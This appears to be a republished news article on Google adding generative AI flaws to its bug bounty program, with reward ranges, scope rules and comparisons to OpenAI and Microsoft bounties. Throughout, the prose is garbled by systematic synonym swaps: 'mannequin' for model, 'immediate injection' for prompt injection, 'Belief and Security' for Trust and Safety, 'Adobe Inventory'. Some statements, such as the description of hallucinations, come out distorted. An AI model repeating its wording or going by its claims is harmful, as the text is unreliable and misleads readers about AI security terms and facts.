Saturday, July 6, 2024

Google Affords Bug Bounties for Generative AI Safety Vulnerabilities


Google’s Vulnerability Reward Program affords as much as $31,337 for locating potential hazards. Google joins OpenAI and Microsoft in rewarding AI bug hunts.

Google logo at Googleplex Silicon Valley Mountain View in California.
Picture: Markus Mainka/Adobe Inventory

Google expanded its Vulnerability Rewards Program to incorporate bugs and vulnerabilities that might be present in generative AI. Particularly, Google is searching for bug hunters for its personal generative AI, merchandise comparable to Google Bard, which is out there in lots of nations, or Google Cloud’s Contact Heart AI, Agent Help.

“We consider this may incentivize analysis round AI security and safety, and produce potential points to mild that may in the end make AI safer for everybody,” Google’s Vice President of Belief and Security Laurie Richardson and Vice President of Privateness, Security and Safety Engineering Royal Hansen wrote in an Oct. 26 weblog publish. “We’re additionally increasing our open supply safety work to make details about AI provide chain safety universally discoverable and verifiable.”

Bounce to:

Google’s bug bounty program: Limitations and rewards

There are limitations as to what counts as a vulnerability in generative AI; a whole listing of what vulnerabilities Google considers in scope or out of scope for the Vulnerability Rewards Program is in this Google safety weblog.

Generative AI introduces dangers conventional computing doesn’t; these dangers embody unfair bias, mannequin manipulation and misinterpretations of knowledge, Richardson and Hansen wrote. Notably, AI “hallucinations” — misinformation generated inside a non-public searching session — don’t depend as vulnerabilities for the needs of the Vulnerability Rewards Program. Assaults that expose delicate data, change the state of a Google person’s account with out their consent or present backdoors right into a generative AI mannequin are inside scope.

Finally, anybody collaborating within the bug bounty must show that the vulnerability they uncover might “pose a compelling assault situation or possible path to Google or person hurt,” in accordance with the Google safety weblog.

Potential Google AI bug bounty rewards

Rewards for the Vulnerability Rewards Program vary from $100 to $31,337, relying on the kind of vulnerability. Particulars on rewards, payouts may be discovered on Google’s Bug Hunters website.

Different bug bounties and customary assault sorts in generative AI

OpenAI, Microsoft and different organizations supply bug bounties for white hat hackers who discover vulnerabilities in generative AI techniques. Microsoft affords between $2,000 and $15,000 for qualifying bugs. OpenAI’s bug bounty program will give between $200 and $20,000.

SEE: IBM X-Pressure researchers discovered phishing emails written by persons are barely extra more likely to get clicks than these written by ChatGPT. (TechRepublic)

In an October 26 report, HackerOne and OWASP discovered that the most typical vulnerability in generative AI was immediate injection (i.e., utilizing prompts to make the AI mannequin do one thing it was not supposed to do), adopted by insecure output dealing with (i.e., when LLM output is accepted with out scrutiny) and the manipulation of coaching knowledge.

How you can study to make use of generative AI

Builders and safety researchers simply beginning out with generative AI have loads of choices in the case of studying find out how to use it, from experimenting with free functions comparable to ChatGPT to taking skilled programs. DeepLearning.AI has programs at each newbie and superior ranges for professionals who need to discover ways to use and develop for synthetic intelligence and machine studying.

Related Articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Stay Connected

0FansLike
3,912FollowersFollow
0SubscribersSubscribe
- Advertisement -spot_img

Latest Articles